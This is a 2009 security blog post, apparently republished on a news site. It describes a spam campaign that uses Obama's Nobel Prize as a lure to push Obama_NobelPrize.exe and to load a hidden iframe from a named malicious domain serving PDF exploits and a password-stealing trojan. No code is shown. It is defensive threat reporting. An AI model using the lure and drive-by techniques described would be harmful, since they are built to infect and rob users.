Obama Nobel Prize Spam Links to Malware and Drive-By
Just when I thought we weren't going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong.  Spammers rarely disappoint when a juicy news story hits.  It's like attracting flies to honey. This spam campaign calls into question whether or [...]

Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong.  Spammers rarely disappoint when a juicy news story hits.  It’s like attracting flies to honey.

This spam campaign calls into question whether or not Barack Obama deserved to win the Nobel Prize and that significant fallout is being felt around the country as a result.  The email then requests that the user click or copy/paste a link into their browser which will direct them to a website where they can download more information.

Obama Nobel Prize Spam

If the user clicks on the link in the email, they are brought to a site where an image of Barack Obama is shown to the user followed by a notification that their download will start shortly.  Remember from the email the user believes that they are going to be downloading a report on the unrest created by Obama’s award acceptance.

Obama Nobel Spam Site

Five seconds after the page loads, the user is prompted to download an executable file named Obama_NobelPrize.exe.  That is not the end of the story, however.  Not satisfied with the possibility of the user suddenly realizing that they are about to download an executable file that they likely do not want, there is an extra bit of fun embedded within this page.  Located at the bottom of the page is a little snippet of encoded Javascript that looks like this:

Encoded JS Script

Decoding this Javascript reveals that this page also attempts to silently load an iframe being hosted off of the tokyopharmm.com domain which attempts to load a series of PDF exploits to inject a password stealing trojan onto the user’s PC currently identified by McAfee as “Generic PWS.y!hv.i”.

This is another example of a situation where current news stories are being used as a vector to lure users into downloading malware.  A popular tactic that has been repeated over and over, but continues to work due to its obvious successes.  Even if you think you are going to outwit the malware authors by visiting their web site, but not downloading the executable that the page prompts you with, that doesn’t preclude the possibility that the page could be executing Javascript in the background which opens up other pages/sites via invisible iframes and testing your machine for other zero day vulnerabilities and exploiting them.


Read Full Article
GSO
Written on Wednesday, 14 October 2009 02:03 by GSO

Viewed 72 times so far.
Like this? Tweet it to your followers!
Published in Subscribe to the RSS feed of Network Security & Hacking News  Network Security & Hacking News / Subscribe to the RSS feed of Global Security News  Global Security News
Like this? Let your friends know now!

Rate this article

Latest articles from GSO

Latest 'tweets' from GovernmentSecurity

blog comments powered by Disqus
back to top
 

Our Sponsors

Shoutcast Streams | Internet Radio HOSTINGLitespeed Web HostingIRC | IRCd | Internet Relay Chat HostingEarn Recurring Income

Member Login